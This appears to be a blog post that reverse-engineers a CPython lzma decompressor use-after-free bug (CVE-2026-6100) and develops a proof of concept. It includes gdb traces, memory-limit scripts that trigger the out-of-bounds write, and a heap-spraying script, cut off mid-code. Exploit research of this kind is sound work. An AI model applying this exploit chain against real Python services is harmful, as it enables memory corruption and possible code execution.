scufFed

Exploiting CVE-2026-6100 for Amusement and Misery

6550 words | 31 minutes

So, according to my phone’s screen time statistics, I spend, on average, about 1.5 hours of a day on Twitter dot com, usually ranging from 1h to 2h. I’d open the app up to 125 times with an average of about 90? opens in a day, which means I quite literally spend, on average ($\mu$), about a minute doomscrolling at a time. The data is probably a lot more left skewed ‘cause there’s definitely moments where I open Twitter for, like, ten seconds, wonder what the hell I’m doing with my life, then close it.

Anyways, the other day I got this tweet on my feed, sandwiched between a 480p recording of Ninajirachi x Porter Robinson’s Wannacry (and that’s a good song title!) and a tweet announcing new Needy Streamer Overload merch:

Fig: The Tweet

I know the words “Python” and “Use-after-free”. I haven’t documented trying to write a CVE PoC before. Let’s see if we can create a full exploit chain with this!

The Bug

The Bug is the pseudonym of Kevin Martin, an extremely prolific UK producer and musician. He was a member of GOD, one of the best jazzcore and industrial metal bands of all time, and under the moniker of The Bug he produces real eclectic grime/hip-hop/industrial/dancehall/dubstep. First time I ever heard of him was that one-off single he made with Death Grips.

Anyway, let’s read the CVE report and try to understand what’s going on.

The CVE Report

The CVE report in full reads as such:

Use-after-free in lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile after re-use under memory pressure

Use-after-free (UAF) was possible in the lzma.LZMADecompressor, bz2.BZ2Decompressor, and gzip.GzipFile when a memory allocation fails with a MemoryError and the decompression instance is re-used. This scenario can be triggered if the process is under memory pressure. The fix cleans up the dangling pointer in this specific error condition. The vulnerability is only present if the program re-uses decompressor instances across multiple decompression calls even after a MemoryError is raised during decompression. Using the helper functions to one-shot decompress data such as lzma.decompress(), bz2.decompress(), gzip.decompress(), and zlib.decompress() are not affected as a new decompressor instance is used per call. If the decompressor instance is not re-used after an error condition, this usage is similarly not vulnerable.

So, some things to note:

Well, send patches or die, right? Let’s see what the actual fix looks like for the affected modules.

The Fix

Here’s the pull request with the fixes implemented. We’ve got four files changed and… ooh. It really is just a UAF cleanup edit.

Fig: The Fixes

In the three affected decompression modules, there’s just a line added to each of their decompression functions to clear out some next_in field on error. Well, with the limited information that we have, let’s start working backwards through one of them.

LZMA has the coolest name of the bunch, so I’m gonna go with that, naturally.

Understanding _lzmamodule.c

We’re reverse engineers, so we read our code in reverse too!

Let’s start from the very end, the error block that we’re so concerned with:

1101...
1102error:
1103    lzs->next_in = NULL;
1104    Py_XDECREF(result);
1105    return NULL;
1106}

Recall that we’re supposed to hit this error block through a MemoryError of sorts. Looking at our gotos, we’ve got a candidate:

1084    /* Allocate if necessary */
1085    if (d->input_buffer == NULL) {
1086        d->input_buffer = PyMem_Malloc(lzs->avail_in);
1087        if (d->input_buffer == NULL) {
1088            PyErr_SetNone(PyExc_MemoryError);
1089            goto error;
1090        }
1091        d->input_buffer_size = lzs->avail_in;
1092    }

So if we somehow hit the condition of d->input_buffer being NULL, it will trigger a PyMem_Malloc requesting size lzs->avail_in, which on failure will raise a MemoryError and fallthrough to the error block. So far, so good. What the fuck are d and lzs?

983static PyObject *
984decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
985{
986    char input_buffer_in_use;
987    PyObject *result;
988    lzma_stream *lzs = &d->lzs;
989...

Okay, cool. Decompressor struct and lzma_stream struct. The Decompressor is defined in this file, thankfully:

111typedef struct {
112    PyObject_HEAD
113    lzma_allocator alloc;
114    lzma_stream lzs;
115    int check;
116    char eof;
117    PyObject *unused_data;
118    char needs_input;
119    uint8_t *input_buffer;
120    size_t input_buffer_size;
121    PyMutex mutex;
122} Decompressor;

But our lzma_stream struct isn’t. It comes from lzma.h, which comes from liblzma. Digging around for some source code yields us the following struct:

typedef struct {
	const uint8_t *next_in; /**< Pointer to the next input byte. */
	size_t avail_in;    /**< Number of available input bytes in next_in. */
	uint64_t total_in;  /**< Total number of bytes read by liblzma. */

	uint8_t *next_out;  /**< Pointer to the next output position. */
	size_t avail_out;   /**< Amount of free space in next_out. */
	uint64_t total_out; /**< Total number of bytes written by liblzma. */
	lzma_allocator *allocator;

	/** Internal state is not visible to applications. */
	lzma_internal *internal;
	void *reserved_ptr1;
	void *reserved_ptr2;
	void *reserved_ptr3;
	void *reserved_ptr4;
	uint64_t reserved_int1;
	uint64_t reserved_int2;
	size_t reserved_int3;
	size_t reserved_int4;
	lzma_reserved_enum reserved_enum1;
	lzma_reserved_enum reserved_enum2;

} lzma_stream;

Nice, let’s start tracing the decompress function from the top down to see how to hit our block of interest.

 983static PyObject *
 984decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
 985{
 986    char input_buffer_in_use;
 987    PyObject *result;
 988    lzma_stream *lzs = &d->lzs;
 989
 990    /* Prepend unconsumed input if necessary */
 991    if (lzs->next_in != NULL) {
 992        size_t avail_now, avail_total;
 993
 994        /* Number of bytes we can append to input buffer */
 995        avail_now = (d->input_buffer + d->input_buffer_size)
 996            - (lzs->next_in + lzs->avail_in);
 997    ...
 998    /* BLAH BLAH BLAH */
 999        memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
1000        lzs->avail_in += len;
1001        input_buffer_in_use = 1;
1002    }
1003    else {
1004        lzs->next_in = data;
1005        lzs->avail_in = len;
1006        input_buffer_in_use = 0;
1007    }
1008
1009    result = decompress_buf(d, max_length);
1010    if (result == NULL) {
1011        lzs->next_in = NULL;
1012        return NULL;
1013    }
1014...

I’ve glossed over the first block that checks if lzs->next_in != NULL because the comment above it explicitly states “Prepend unconsumned input if necessary”, implying this is unlikely to be called on a first pass. Recall that our vulnerability hinges on a reuse, so the first time the function is called, it probably wouldn’t be trying to handle unconsumed input…? In fact, lzs is probably mostly uninitialised (this assumption will turn out to be true), so the relevant block is just the one where the next_in and avail_in fields are being set.

The Python code that would call this function would look a little like this:

import lzma
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(b'[data_goes_here]', max_length)

Where data and len are drawn from, well, the data you pass in. This is followed up by a call to decompress_buf, which is the handover function that actually calls lzma_code.

921/* Decompress data of length d->lzs.avail_in in d->lzs.next_in.  The output
922   buffer is allocated dynamically and returned.  At most max_length bytes are
923   returned, so some of the input may not be consumed. d->lzs.next_in and
924   d->lzs.avail_in are updated to reflect the consumed input. */
925static PyObject*
926decompress_buf(Decompressor *d, Py_ssize_t max_length)
927{
928    PyObject *result;
929    lzma_stream *lzs = &d->lzs;
930    _BlocksOutputBuffer buffer = {.writer = NULL};
931    _lzma_state *state = PyType_GetModuleState(Py_TYPE(d));
932    assert(state != NULL);
933
934    if (OutputBuffer_InitAndGrow(&buffer, max_length, &lzs->next_out, &lzs->avail_out) < 0) {
935        goto error;
936    }
937
938    for (;;) {
939        lzma_ret lzret;
940
941        Py_BEGIN_ALLOW_THREADS
942        lzret = lzma_code(lzs, LZMA_RUN);
943        Py_END_ALLOW_THREADS
944
945        if (lzret == LZMA_BUF_ERROR && lzs->avail_in == 0 && lzs->avail_out > 0) {
946            lzret = LZMA_OK; /* That wasn't a real error */
947        }
948        if (catch_lzma_error(state, lzret)) {
949            goto error;
950        }
951        if (lzret == LZMA_GET_CHECK || lzret == LZMA_NO_CHECK) {
952            FT_ATOMIC_STORE_INT_RELAXED(d->check, lzma_get_check(&d->lzs));
953        }
954        if (lzret == LZMA_STREAM_END) {
955            FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
956            break;
957        } else if (lzs->avail_out == 0) {
958            /* Need to check lzs->avail_out before lzs->avail_in.
959               Maybe lzs's internal state still have a few bytes
960               can be output, grow the output buffer and continue
961               if max_lengh < 0. */
962            if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
963                break;
964            }
965            if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
966                goto error;
967            }
968        } else if (lzs->avail_in == 0) {
969            break;
970        }
971    }
972
973    result = OutputBuffer_Finish(&buffer, lzs->avail_out);
974    if (result != NULL) {
975        return result;
976    }
977
978error:
979    OutputBuffer_OnError(&buffer);
980    return NULL;
981}

This function cannot fail/return NULL as it’ll kill off the rest of our decompress call (this is called foreshadowing). Additionally, we get a sense for what max_length does here, which the docstring actually does elucidate further:

If max_length is nonnegative, returns at most max_length bytes of decompressed data. If this limit is reached and further output can be produced, self.needs_input will be set to False. In this case, the next call to decompress() may provide data as b'' to obtain more of the output.

So this is how we get our partial decompression: by calling decompress with a max_length value that is shorter than the full decompressed buffer.

Looking at the if blocks that come after, we can see what conditions we need to miss:

1041    if (d->eof) {
1042        FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);
1043        if (lzs->avail_in > 0) {
1044            PyObject *unused_data = PyBytes_FromStringAndSize(
1045                (char *)lzs->next_in, lzs->avail_in);
1046            if (unused_data == NULL) {
1047                goto error;
1048            }
1049            Py_XSETREF(d->unused_data, unused_data);
1050        }
1051    }
1052    else if (lzs->avail_in == 0) {
1053        lzs->next_in = NULL;
1054
1055        if (lzs->avail_out == 0) {
1056            /* (avail_in==0 && avail_out==0)
1057               Maybe lzs's internal state still have a few bytes can
1058               be output, try to output them next time. */
1059            FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 0);
1060
1061            /* If max_length < 0, lzs->avail_out always > 0 */
1062            assert(max_length >= 0);
1063        } else {
1064            /* Input buffer exhausted, output buffer has space. */
1065            FT_ATOMIC_STORE_CHAR_RELAXED(d->needs_input, 1);
1066        }
1067    }
1068    else {
1069        // the actual block we want to hit
1070    ...

So we can’t allow d->eof to be set high. This only happens in decompress_buf if lzret == LZMA_STREAM_END, so we will pass by this easily since we’re not consuming the full stream.

Similarly, we coast past lzs->avail_in == 0 as we intentionally leave some residual data, so these if blocks aren’t really a problem.

Now, what happens when you call the function again? Before the patch, the lzs->next_in field doesn’t get NULLd out. We know that this will contain a pointer to our input data of sorts (does it get advanced or modified during the call to lzma_code? Easiest way to find out is by debugging later!), so let’s actually trace the non-NULL block of decompress now:

 991    if (lzs->next_in != NULL) {
 992        size_t avail_now, avail_total;
 993
 994        /* Number of bytes we can append to input buffer */
 995        avail_now = (d->input_buffer + d->input_buffer_size)
 996            - (lzs->next_in + lzs->avail_in);
 997
 998        /* Number of bytes we can append if we move existing
 999           contents to beginning of buffer (overwriting
1000           consumed input) */
1001        avail_total = d->input_buffer_size - lzs->avail_in;
1002
1003        if (avail_total < len) {
1004            size_t offset = lzs->next_in - d->input_buffer;
1005            uint8_t *tmp;
1006            size_t new_size = d->input_buffer_size + len - avail_now;
1007
1008            /* Assign to temporary variable first, so we don't
1009               lose address of allocated buffer if realloc fails */
1010            tmp = PyMem_Realloc(d->input_buffer, new_size);
1011            if (tmp == NULL) {
1012                PyErr_SetNone(PyExc_MemoryError);
1013                return NULL;
1014            }
1015            d->input_buffer = tmp;
1016            d->input_buffer_size = new_size;
1017
1018            lzs->next_in = d->input_buffer + offset;
1019        }
1020        else if (avail_now < len) {
1021            memmove(d->input_buffer, lzs->next_in,
1022                    lzs->avail_in);
1023            lzs->next_in = d->input_buffer;
1024        }
1025        memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
1026        lzs->avail_in += len;
1027        input_buffer_in_use = 1;
1028    }

Eyeballing this, we can see where the OOB Write is. It’s probably all the way down at the end, with that pesky memcpy. We have a dangling pointer to data (or something related) since we never cleared out lzs->next_in, and now it will copy whatever new data we’re passing in to an address past that. If next_in and avail_in are untouched by the previous call, we actually just get a direct OOB Write to whatever memory lies right after the original data!

Okay, so we’ve got a rough idea of what’s going on. Pretty straightforward, too:

So, shall we?

Pressure Torture

On Venetian Snares’ album “Doll Doll Doll”, there’s a track called “Pressure Torture”. It’s a 7:49 minute track of pummelling snares, bass strikes and, of course, utterly fucked up chopped Amen Breaks. It’s music made to beat you up; hardly for pleasure, hardly for enjoyment.

Anyways, we need to somehow get PyMem_Malloc to fail. The CVE report gives us a clue: “This scenario can be triggered if the process is under memory pressure.”.

Let’s do a little bit of debugging to figure out how we can attain that pressure.

Tracing the decompress Call

I am a staunch believer that you don’t always need symbols during debugging. If you’re good, you should just be able to eyeball the structs and see where the data should be without needing text all over the fucking place.

However, I decided to give in for once and compiled the last Python commit prior to this patch (480edc1aae0) in debug mode by throwing in a nifty little ./configure --with-pydebug CFLAGS="-g3 -O0". Blasphemous.

Let’s write a simple script to test the decompress function:

import lzma

decompressor = lzma.LZMADecompressor()

# we need to start with some valid data at first, at least
t = bytearray(b'asdfgda')
t = lzma.compress(t)
a = decompressor.decompress(t, 1)

We can then set a breakpoint in gdb by calling b ../Modules/_lzmamodule.c:decompress to begin tracing.

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d0db <decompress+000c> mov    QWORD PTR [rbp-0x70], rsi
   0x7ffff7b2d0df <decompress+0010> mov    QWORD PTR [rbp-0x78], rdx
   0x7ffff7b2d0e3 <decompress+0014> mov    QWORD PTR [rbp-0x80], rcx
●→ 0x7ffff7b2d0e7 <decompress+0018> mov    rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2d0eb <decompress+001c> add    rax, 0x28
   0x7ffff7b2d0ef <decompress+0020> mov    QWORD PTR [rbp-0x50], rax
   0x7ffff7b2d0f3 <decompress+0024> mov    rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d0f7 <decompress+0028> mov    rax, QWORD PTR [rax]
   0x7ffff7b2d0fa <decompress+002b> test   rax, rax
─────────────────────────────────────────────────────────── source:../Modules/_lzmamodule.c+988 ────
    983	 static PyObject *
    984	 decompress(Decompressor *d, uint8_t *data, size_t len, Py_ssize_t max_length)
    985	 {
    986	     char input_buffer_in_use;
    987	     PyObject *result;
             // d=0x00007fffffff9ea8  →  [...]  →  0x0000000000000002, lzs=0x00007fffffff9ec0  →  0x0000000001000000
 →  988	     lzma_stream *lzs = &d->lzs;
    989	
    990	     /* Prepend unconsumed input if necessary */
    991	     if (lzs->next_in != NULL) {
    992	         size_t avail_now, avail_total;
    993	
─────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "python", stopped 0x7ffff7b2d0e7 in decompress (), reason: BREAKPOINT

Here we can start checking off some of our assumptions. Stepping a little then pretty printing the lzma_stream struct at this point shows us it is, in fact, largely uninitialized:

gef➤  print *(lzma_stream *) 0x00007ffff7c2e468
$3 = {
  next_in = 0x0,
  avail_in = 0x0,
  total_in = 0x0,
  next_out = 0x0,
  avail_out = 0x0,
  total_out = 0x0,
  allocator = 0x7ffff7c2e450,
  internal = 0x555555ec8a10,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}

and it will get filled in with our input compressed data once we go further in:

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d29d <decompress+01ce> mov    rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d2a1 <decompress+01d2> mov    rdx, QWORD PTR [rbp-0x78]
   0x7ffff7b2d2a5 <decompress+01d6> mov    QWORD PTR [rax+0x8], rdx
 → 0x7ffff7b2d2a9 <decompress+01da> mov    BYTE PTR [rbp-0x51], 0x0
   0x7ffff7b2d2ad <decompress+01de> mov    rdx, QWORD PTR [rbp-0x80]
   0x7ffff7b2d2b1 <decompress+01e2> mov    rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2d2b5 <decompress+01e6> mov    rsi, rdx
   0x7ffff7b2d2b8 <decompress+01e9> mov    rdi, rax
   0x7ffff7b2d2bb <decompress+01ec> call   0x7ffff7b2cec7 <decompress_buf>
────────────────────────────────────────────────────────── source:../Modules/_lzmamodule.c+1032 ────
   1027	         input_buffer_in_use = 1;
   1028	     }
   1029	     else {
   1030	         lzs->next_in = data;
   1031	         lzs->avail_in = len;
                 // input_buffer_in_use=0x0
 → 1032	         input_buffer_in_use = 0;
   1033	     }
   1034	
   1035	     result = decompress_buf(d, max_length);
   1036	     if (result == NULL) {
   1037	         lzs->next_in = NULL;
...
────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤  print *(lzma_stream *) 0x00007ffff7c2e468
$4 = {
  next_in = 0x7ffff77b9ce0 "\3757zXZ",
  avail_in = 0x40,
  total_in = 0x0,
  next_out = 0x0,
  avail_out = 0x0,
...

We continue execution past decompress_buf to see how this changes our structs:

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2d2b5 <decompress+01e6> mov    rsi, rdx
   0x7ffff7b2d2b8 <decompress+01e9> mov    rdi, rax
   0x7ffff7b2d2bb <decompress+01ec> call   0x7ffff7b2cec7 <decompress_buf>
●→ 0x7ffff7b2d2c0 <decompress+01f1> mov    QWORD PTR [rbp-0x20], rax
   0x7ffff7b2d2c4 <decompress+01f5> cmp    QWORD PTR [rbp-0x20], 0x0
   0x7ffff7b2d2c9 <decompress+01fa> jne    0x7ffff7b2d2e0 <decompress+529>
   0x7ffff7b2d2cb <decompress+01fc> mov    rax, QWORD PTR [rbp-0x50]
   0x7ffff7b2d2cf <decompress+0200> mov    QWORD PTR [rax], 0x0
   0x7ffff7b2d2d6 <decompress+0207> mov    eax, 0x0
...
gef➤  print *(Decompressor *)0x00007fffffff9ea8
$5 = {
  ob_base = {
    {
      ob_refcnt_full = 0x7ffff7c2e440,
      {
        ob_refcnt = 0xf7c2e440,
        ob_overflow = 0x7fff,
        ob_flags = 0x0
      },
      _aligner = 0x40
    },
    ob_type = 0x7fffffff9ed0
  },
...
  check = 0xf7b2c04f,
  eof = 0xff,
  unused_data = 0x0,
  needs_input = 0x2,
  input_buffer = 0x7fffffffa1c0 "\300\234{\367\377\177",
  input_buffer_size = 0x7ffff7c2e440,
  mutex = {
    _bits = 0xa0
  }
}
gef➤  print *(lzma_stream *)0x7ffff7c2e468
$7 = {
  next_in = 0x7ffff77b9cfc "sdfgda",
  avail_in = 0x24,
  total_in = 0x1c,
  next_out = 0x7ffff7bd1341 "",
  avail_out = 0x0,
  total_out = 0x1,
  allocator = 0x7ffff7c2e450,
  internal = 0x555555ec8a10,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}

Note that next_in now contains the remaining data, decompressed. This is likely because we passed in a very short string, so it just decompresses the whole block and goes on its merry way. Notice the changes to avail_in, total_in, avail_out, and total_out too. total_out directly reflects the amount of data we requested, while total_in goes up by 0x1c as that’s the length we’ve ingested (and thus incremented next_in by).

Also, notice how d->eof remains at 0xff and lzs->avail_in is non-zero, which means we will very cleanly fall into our target if block to trigger the bug!

Making PyMem_Malloc Fail

So this is the annoying bit. Intuitively, a malloc operation would only fail if for some reason, the program is unable to serve the amount of free memory requested in that malloc request. It seems unlikely that during decompression we somehow manage to assign an obscene length to lzs->avail_in, nor would there be a way to restore it to a reasonable value afterwards.

This is where the earlier statement on “memory pressure” comes in. If we manage to get the program to be in a memory exhausted state with a sufficiently fractured heap, then even a “smaller” allocation request for something like, I dunno, a megabyte? would fail.

So we need to tune our resource allocation in such a way that there’s enough free memory for everything (that is, up till decompress_buf returning) to carry on with no errors, but the moment we hit that PyMem_Malloc the program goes kaput.

We can artificially restrict the resource limits of a Python script with the following:

import resource

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = 64 * 1024 * 1024 # 64 MB

# this will set a 64 MB memory cap on the program
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit)) 

# this will restore the original resources
resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit)) 

We can now experiment with our limits a bit. I compress some high entropy data (i.e. I ran lzma.compress(os.urandom(2*1024*1024)))) which would create both a large compressed buffer and a large uncompressed buffer. Then, we just start playing around with our resource limits until we hit something nice.

import resource
import lzma

# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
print(f"cap mem at {limit / 1024 / 1024} MB")

c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = decompressor.decompress(c, 1)

This is juuuuust nice. We manage to make it through decompress_buf without it dying there, and we hit the error path that we want.

[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────── registers ────
$rax   : 0x0
$rbx   : 0x00007ffff7c555dc  →  0x0a73000000000001
$rcx   : 0x0
$rdx   : 0xffffffffffffff80
...
─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b2644f <decompress+0380> mov    rax, QWORD PTR [rax+0x8]
   0x7ffff7b26453 <decompress+0384> mov    rdi, rax
   0x7ffff7b26456 <decompress+0387> call   0x7ffff7b234b0 <PyMem_Malloc@plt>
●→ 0x7ffff7b2645b <decompress+038c> mov    rdx, QWORD PTR [rbp-0x68]
   0x7ffff7b2645f <decompress+0390> mov    QWORD PTR [rdx+0xc8], rax
   0x7ffff7b26466 <decompress+0397> mov    rax, QWORD PTR [rbp-0x68]
   0x7ffff7b2646a <decompress+039b> mov    rax, QWORD PTR [rax+0xc8]
   0x7ffff7b26471 <decompress+03a2> test   rax, rax
   0x7ffff7b26474 <decompress+03a5> jne    0x7ffff7b2648a <decompress+955>
...

Notice how $rax is 0x0 following the PyMem_Malloc call, implying it failed and we will fallthrough to our error block, which we do!

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b264d4 <decompress+0405> mov    rax, QWORD PTR [rbp-0x20]
   0x7ffff7b264d8 <decompress+0409> jmp    0x7ffff7b264ec <decompress+1053>
   0x7ffff7b264da <decompress+040b> nop    
 → 0x7ffff7b264db <decompress+040c> mov    rax, QWORD PTR [rbp-0x20]
   0x7ffff7b264df <decompress+0410> mov    rdi, rax
   0x7ffff7b264e2 <decompress+0413> call   0x7ffff7b2393d <Py_XDECREF>
   0x7ffff7b264e7 <decompress+0418> mov    eax, 0x0
   0x7ffff7b264ec <decompress+041d> leave
   0x7ffff7b264ed <decompress+041e> ret
────────────────────────────────────────────────────────── source:../Modules/_lzmamodule.c+1103 ────
   1098	     }
   1099	 
   1100	     return result;
   1101	 
   1102	 error:
             // result=0x00007fffffff9ef0  →  [...]  →  <_PyRuntime+10e80> add BYTE PTR [rax], al
 → 1103	     Py_XDECREF(result);
   1104	     return NULL;
   1105	 }
   1106	
   1107	 /*[clinic input]
   1108	 @permit_long_docstring_body

Purrrrrfect. This was done through just trial and error, and for reasons that’ll become apparent later, we’re going to need better methods. Either way, we get our PyMem_Malloc failure here, so trigger the bug should be trivial from here!

Triggering the Bug

As we’ve figure out, we need to catch our MemoryError that decompress will throw, then call decompress one more time with some input data which should get memcpy’d OOB. Let’s update our script to reflect this:

import resource
import lzma

# simulate memory exhaustion
limit = int(33 * 1024 * 1024) # by the scientific method we arrive at this to be our limit
resource.setrlimit(resource.RLIMIT_AS, (limit, limit))
print(f"cap mem at {limit / 1024 / 1024} MB")

# so our memory exhaustion is a bit the very tight
c = b'\xfd7zXZ\x00\x00\x04...' # our 2 MB buffer
decompressor = lzma.LZMADecompressor()
a = None

try:
    input(f"Decompressor is at {hex(id(decompressor))}")
    a = decompressor.decompress(c, 1)
except MemoryError:
    pass
finally:
    # restore our resources so we struggle less post-bug
    resource.setrlimit(resource.RLIMIT_AS, (soft_limit, hard_limit))

input("MemError triggered, decompressing again")
a = decompressor.decompress(b'A'*16, 1)

We now just step through our script in gdb and see what happens on the decompress calls! After falling through to the error block in the first call, we can check what our lzma_stream struct looks like, knowing that it doesn’t get cleared out properly:

─────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
   0x7ffff7b264e2 <decompress+0413> call   0x7ffff7b2393d <Py_XDECREF>
   0x7ffff7b264e7 <decompress+0418> mov    eax, 0x0
   0x7ffff7b264ec <decompress+041d> leave  
 → 0x7ffff7b264ed <decompress+041e> ret    
...
gef➤  print *(lzma_stream *)0x7ffff7c2e468
$13 = {
  next_in = 0x7ffff6bda06c "\020J\022_%\"\024\377\017\276\226dwW*\3568\330&...,
  avail_in = 0x100054,
  total_in = 0x1c,
  next_out = 0x7ffff7bd1341 "",
  avail_out = 0x0,
  total_out = 0x1,
  allocator = 0x7ffff7c2e450,
  internal = 0x555555e53b50,
  reserved_ptr1 = 0x0,
  reserved_ptr2 = 0x0,
  reserved_ptr3 = 0x0,
  reserved_ptr4 = 0x0,
  seek_pos = 0x0,
  reserved_int2 = 0x0,
  reserved_int3 = 0x0,
  reserved_int4 = 0x0,
  reserved_enum1 = LZMA_RESERVED_ENUM,
  reserved_enum2 = LZMA_RESERVED_ENUM
}

Now, let’s continue on to the second decompress call.

We of course pass the lzs->next_in != NULL check, and both the calculated avail_now and avail_total are negative (since input_buffer and input_buffer_size in d are 0, so we just… get negative numbers), bypassing the PyMem_Realloc and memmove logic. We now land on the memcpy as expected!

─────────────────────────────────────────────────────────────────────────── arguments (guessed) ────
memcpy@plt (
   $rdi = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00,
   $rsi = 0x00007ffff77e8c40 → "AAAAAAAAAAAAAAAA",
   $rdx = 0x0000000000000010,
   $rcx = 0x00007ffff6cda0c0 → 0xfdfdfdfdfdfdfd00
)
────────────────────────────────────────────────────────── source:../Modules/_lzmamodule.c+1025 ────
   1020	         else if (avail_now < len) {
   1021	             memmove(d->input_buffer, lzs->next_in,
   1022	                     lzs->avail_in);
   1023	             lzs->next_in = d->input_buffer;
   1024	         }
                 // data=0x00007fffffff9ea0  →  [...]  →  "AAAAAAAAAAAAAAAA", lzs=0x00007fffffff9ec0  →  [...]  →  0xff1422255f124a10
 → 1025	         memcpy((void*)(lzs->next_in + lzs->avail_in), data, len);
   1026	         lzs->avail_in += len;
   1027	         input_buffer_in_use = 1;
   1028	     }
   1029	     else {
   1030	         lzs->next_in = data;

We will be writing to 0x7ffff6cda0c0, which is the boundary of the original buffer (since we compute next_in + avail_in), a clear OOB write. If we manage to get some sort of useful struct adjacent to the original buffer, then we’re golden in upgrading this OOB write to an arbitrary R/W!

Note: as I’m writing this post, for some reason this buffer is sitting in the pyheap (0x7ffff7600000 range) rather than the regular glibc heap (0x555555e51000 range). This pisses me off because the fact that a large buffer should be landing in the glibc heap instead is part of why the next few sections are so messy. Regardless, we cringe on.

Going Places

Yellow Swans are an interesting noise/ambient/drone/tape music project. Something I’m a big fan of is all of their alt names (the same way SPK or Feotus has hella alt names), all being some variation on D.* Yellow Swans. Drowner Yellow Swans, Dove Yellow Swans, Doorendoorslechte Yellow Swans“Going Places” is easily their most popular work, and for good reason. Ethereal yet damning ambient soundscapes that swallow you whole.

Anyways, let’s try to upgrade our primitive.

Finer Memory Control

Right now, our memory exhaustion is being triggered by, well, dumb luck. We have just enough memory that we only have a failed malloc at the specific block we want, and this quickly becomes extremely unreliable once you as much as sneeze on the code. Furthermore, we want to at least try to get our buffer to land in the pyheap rather than the glibc heap so that we have more structs to play with.

We start by shrinking down our LZMA compressed payload to a healthier 2kB. If we’re good, we can make this work. Since we also want adjacent structs, we should try something sort of but not exactly ? but maybe it actually is heap spraying: after shrinking our memory space, we spam objects until we hit our memory limit, then we pop a few which ideally should be adjacent

import resource
import lzma

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        # sprayyyy
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
# these should be side by side?
fillers.pop()
fillers.pop()

c = bytearray(
    b'\xfd7zXZ\x00...' # shrunk down to 2kB
    )
d = bytearray(len(c))

We’re hitting another snag though. Remember the lzma_code calls in decompress_buf? That allocates a bunch of crap too, so now we keep hitting a premature MemoryError after a few iterations of it before we can even make it to our error block. After a bit of tinkering, however, an obvious solution came to me.

953...
954    if (lzret == LZMA_STREAM_END) {
955        FT_ATOMIC_STORE_CHAR_RELAXED(d->eof, 1);
956        break;
957    } else if (lzs->avail_out == 0) {
958        /* Need to check lzs->avail_out before lzs->avail_in.
959            Maybe lzs's internal state still have a few bytes
960            can be output, grow the output buffer and continue
961            if max_lengh < 0. */
962        if (OutputBuffer_GetDataSize(&buffer, lzs->avail_out) == max_length) {
963            break;
964        }
965        if (OutputBuffer_Grow(&buffer, &lzs->next_out, &lzs->avail_out) < 0) {
966            goto error;
967        }
968...

If lzs->avail_out is set to 0x0, we will exit decompress_buf after just one lzma_code call. For some reason, we can call decompress with a max_length of… zero. So that means we can get decompress_buf to reliably prematurely exit, making our memory conditions easier to hit. Wonderful! Our script now looks something like this:

import resource
import lzma
import os

import ctypes

def heap_addr(b: bytearray) -> int:
    buf = (ctypes.c_char * len(b)).from_buffer(b)
    return ctypes.addressof(buf)

soft_limit, hard_limit = resource.getrlimit(resource.RLIMIT_AS)

limit = int(32 * 1024 * 1024) # because shaving a megabyte makes all the difference
resource.setrlimit(resource.RLIMIT_AS, (limit, hard_limit))

SIZE = 2*1024
fillers = []
try:
    while True:
        fillers.append(bytearray(SIZE))
except MemoryError:
    pass
fillers.pop()
fillers.pop()

c = bytearray(
    b'\xfd7zXZ\x00...' # shrunk down to 2kB
    )
d = bytearray(len(c))

print(f'Allocated {len(fillers)} fillers of size {SIZE/1024}kB each')
decompressor = lzma.LZMADecompressor()

try:
    print(f"Original data at {hex(id(c))}, {hex(heap_addr(c))}")
    print(f"Next thing at {hex(id(d))}, {hex(heap_addr(d))}")
